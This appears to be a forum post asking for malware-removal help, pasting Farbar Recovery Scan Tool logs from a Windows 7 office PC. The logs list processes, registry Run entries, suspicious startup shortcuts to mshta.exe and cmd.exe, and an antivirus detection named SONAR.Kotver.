Process ID: 27d4 Start Time: 01d25004559b8057 Termination Time: 34332 Application Path: C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE Report Id: 9868f99d-bbfa-11e6-8bb5-00270e34bb77 Error: (12/06/2016 11:44:38 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Acrobat.exe version 10.1.5.33 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 19e8 Start Time: 01d24fdfce7ba9bc Termination Time: 60000 Application Path: C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat.exe Report Id: 14e9b3ad-bbd3-11e6-8bb5-00270e34bb77 Error: (12/06/2016 11:37:12 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Acrobat.exe version 10.1.5.33 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 2334 Start Time: 01d24fdebc3fce12 Termination Time: 76 Application Path: C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat.exe Report Id: 2abd62c7-bbd2-11e6-8bb5-00270e34bb77 Error: (12/06/2016 08:01:22 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program OUTLOOK.EXE version 14.0.7172.5000 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 19d0 Start Time: 01d24fbfb71c285a Termination Time: 9518 Application Path: C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE Report Id: 05e67684-bbb4-11e6-8bb5-00270e34bb77 Error: (12/06/2016 07:50:30 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: ) Description: A problem prevented Customer Experience Improvement Program data from being sent to Microsoft, (Error 80004005). 
Error: (12/06/2016 05:52:41 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS) Description: Security Risk Found!SONAR.Kotver!gen4 in File: c:\windows\syswow64\rundll32.exe by: SONAR scan. Action: . Action Description: Access Denied System errors: ============= Error: (12/07/2016 05:35:16 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 40. Error: (12/07/2016 04:55:11 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 04:47:44 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 03:31:55 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 03:07:47 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY) Description: The following fatal alert was generated: 10. The internal error state is 10. Error: (12/07/2016 03:07:23 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 02:01:49 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY) Description: The following fatal alert was generated: 10. The internal error state is 10. Error: (12/07/2016 01:31:17 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 01:10:50 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/06/2016 10:25:12 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY) Description: The following fatal alert was generated: 10. The internal error state is 10. 
CodeIntegrity: =================================== Date: 2016-10-12 11:10:15.723 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-12 11:10:15.676 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2014-12-30 14:37:50.421 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-30 14:21:58.702 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-30 14:00:27.988 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 16:13:00.235 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 15:58:22.386 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. 
Date: 2014-12-29 15:21:37.531 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 14:59:21.278 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 14:46:25.562 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz Percentage of memory in use: 53% Total physical RAM: 4052.52 MB Available physical RAM: 1876.44 MB Total Virtual: 8103.22 MB Available Virtual: 5822.23 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:465.66 GB) (Free:330.92 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: EB6F6C15) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS) ==================== End of Addition.txt ============================
  2. Also I notice in the Windows System Event Log that groups of services (not always the same ones) are stopping and restarting.
  3. Thanks in advance.
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 05-12-2016 Ran by Reception (administrator) on PC-4 (07-12-2016 03:51:00) Running from \\SPARTA\RedirectedFolders\Reception\Desktop Loaded Profiles: Clayton & Reception (Available Profiles: Clayton & dcreery & blagler & Reception) Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: Chrome) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe () C:\Program Files (x86)\Backblaze\bzserv.exe (FileZilla Project) C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe (Print Tracker (866) 629-3342) C:\Program Files (x86)\Print Tracker\PMonitor.exe (Print Tracker (866) 629-3342) C:\Program Files (x86)\Print Tracker\PMonitor.kpr () C:\Windows\SysWOW64\PSIService.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (LogMeIn, Inc.) 
C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe (Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe (Microsoft Corporation) C:\Windows\System32\mobsync.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Farbar) \\SPARTA\RedirectedFolders\Reception\Desktop\FRST64.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe ==================== Registry (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-07-26] (Apple Inc.) HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-11-05] (LogMeIn, Inc.) 
HKLM-x32\...\Run: [FileZilla Server Interface] => C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe [2452480 2015-01-09] (FileZilla Project) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [Malwarebytes Anti-Malware] => C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe [3219456 2016-12-06] (Malwarebytes) Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.) Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\888\g2ax_winlogonx64.dll (Citrix Systems, Inc.) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Run: [**suokibuts<*>] => "C:\Users\Reception\AppData\Local\7b8b\d848.lnk" <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Ribbons.scr [241664 2010-11-20] (Microsoft Corporation) HKU\S-1-5-18\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-14] () IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\0783.lnk [2016-10-12] ShortcutTarget: 0783.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation) Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\356a.lnk [2016-12-07] ShortcutTarget: 356a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation) Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\5cf1.lnk [2016-11-23] ShortcutTarget: 5cf1.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) CHR HKLM\SOFTWARE\Policies\Google: 
Restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.0.105 192.168.0.1 Tcpip\..\Interfaces\{0B496D74-E088-4F45-B2FD-58E5E9F5F3E1}: [DhcpNameServer] 192.168.0.105 192.168.0.1 Tcpip\..\Interfaces\{A4BE6A85-3332-4C3B-A231-82D7AFF8DAF1}: [DhcpNameServer] 172.20.10.1 Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://companyweb HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Software\Microsoft\Internet 
Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp SearchScopes: HKLM-x32 -> DefaultScope {1A6ECD44-6984-4DCD-B3DF-84F92EC8DA9E} URL = BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\TmIEPlg.dll => No File BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation) BHO-x32: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\bin\IPS\IPSBHO.DLL [2014-10-03] (Symantec Corporation) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation) Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-12-18] (Adobe Systems Incorporated) Toolbar: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} hxxp://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\TmIEPlg32.dll No File Handler: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Client Server Security Agent\UIFramework\ProToolbarIMRatingActiveX.dll No File FireFox: ======== FF ProfilePath: 
C:\Users\Reception\AppData\Roaming\Mozilla\Firefox\Profiles\biqbxlip.default-1478011673580 [2016-11-09] FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\firefoxextension => not found FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 FF Extension: (HP Smart Web Printing) - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2011-05-13] [not signed] FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-04-03] [not signed] FF HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-08] () FF Plugin: @microsoft.com/GENUINE -> disabled [No File] FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-08] () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-12-18] () FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File] FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> 
C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation) FF Plugin-x32: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll [2014-02-18] (RocketLife, LLP) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-09] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-09] (Google Inc.) FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2013-02-15] (Adobe Systems Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-12-18] (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-3320201264-2921037059-4171379232-1192: @citrixonline.com/appdetectorplugin -> C:\Users\Reception\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-06-05] (Citrix Online) Chrome: ======= CHR Profile: C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default [2016-12-06] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap 
[2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-11-09] CHR Extension: (Avast Online Security) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-11-09] CHR Extension: (Chrome Web Store Payments) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-11-09] CHR Extension: (Chrome Media Router) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-06] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.) R2 bzserv; C:\Program Files (x86)\Backblaze\bzserv.exe [356008 2016-11-14] () R2 FileZilla Server; C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe [774656 2015-01-09] (FileZilla Project) [File not signed] S3 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\g2aservice.exe [309080 2014-06-05] (Citrix Online, a division of Citrix Systems, Inc.) S3 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\888\g2ax_service.exe [610528 2016-01-12] (Citrix Systems, Inc.) R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1039360 2010-10-22] (Hewlett-Packard Co.) [File not signed] R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [419336 2016-10-12] (LogMeIn, Inc.) 
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-12-05 12:11 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\registration 2016-12-05 12:09 - 2011-05-13 12:23 - 00000000 __RHD C:\MSOCache 2016-12-02 12:08 - 2015-02-11 16:28 - 00000000 ____D C:\Users\Reception\AppData\Local\CrashDumps 2016-11-14 18:12 - 2009-07-14 00:13 - 00782778 _____ C:\Windows\system32\PerfStringBackup.INI 2016-11-14 07:53 - 2015-11-11 10:58 - 00000000 ____D C:\Program Files (x86)\Backblaze 2016-11-10 15:36 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF 2016-11-10 13:19 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\rescache 2016-11-10 06:56 - 2009-07-13 23:45 - 01637720 _____ C:\Windows\system32\FNTCACHE.DAT 2016-11-09 17:09 - 2013-08-14 02:01 - 00000000 ____D C:\Windows\system32\MRT 2016-11-09 16:57 - 2011-05-11 10:40 - 141011376 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2016-11-09 14:39 - 2011-05-16 08:24 - 00000000 ____D C:\Users\Reception\AppData\Local\Google 2016-11-08 20:22 - 2012-01-04 10:02 - 00000000 ____D C:\Windows\Hewlett-Packard 2016-11-08 16:14 - 2014-10-23 11:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2016-11-08 16:09 - 2011-05-13 16:24 - 00001024 _____ C:\.rnd 2016-11-08 10:02 - 2013-02-27 07:50 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2016-11-08 10:02 - 2013-02-27 07:50 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2016-11-08 10:02 - 2013-02-27 07:50 - 00000000 ____D C:\Windows\system32\Macromed 2016-11-08 10:02 - 2011-07-25 07:38 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2016-11-08 10:02 - 2011-05-13 16:09 - 00000000 ____D C:\Windows\SysWOW64\Macromed ==================== Files in the root of some directories ======= 2014-10-23 15:43 - 2014-10-23 15:43 - 0000272 _____ () C:\Users\Reception\AppData\Roaming\.backup.dm 2011-05-13 16:12 - 2011-05-13 16:12 - 0000697 _____ () C:\Users\Reception\AppData\Roaming\ConvAPIPlugin.log 
2015-08-07 13:53 - 2015-08-07 13:53 - 0022544 _____ () C:\Users\Reception\AppData\Roaming\UserTile.png 2014-10-24 13:59 - 2014-10-24 13:59 - 0007643 _____ () C:\Users\Reception\AppData\Local\Resmon.ResmonCfg 2016-11-10 14:24 - 2016-07-14 04:09 - 0010240 _____ () C:\Users\Reception\AppData\Local\Z@!-66cdbda3-850e-49fb-bcc4-315e343cf0e0.tmp 2016-11-10 14:24 - 2016-07-14 04:09 - 0009216 _____ () C:\Users\Reception\AppData\Local\Z@S!-41305b6f-9545-4896-8e05-c1bc01799922.tmp 2013-11-11 09:40 - 2013-11-11 09:40 - 0000057 _____ () C:\ProgramData\Ament.ini 2011-05-13 15:07 - 2011-05-13 16:12 - 0003443 _____ () C:\ProgramData\hpzinstall.log ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-12-02 04:41 ==================== End of FRST.txt ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version: 05-12-2016 Ran by Reception (07-12-2016 03:52:14) Running from 
\\SPARTA\RedirectedFolders\Reception\Desktop Windows 7 Professional Service Pack 1 (X64) (2011-05-13 16:44:56) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= admin (S-1-5-21-1158510682-2263174364-945799988-1001 - Administrator - Enabled) Administrator (S-1-5-21-1158510682-2263174364-945799988-500 - Administrator - Disabled) Guest (S-1-5-21-1158510682-2263174364-945799988-501 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Symantec Endpoint Protection (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Symantec Endpoint Protection (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 
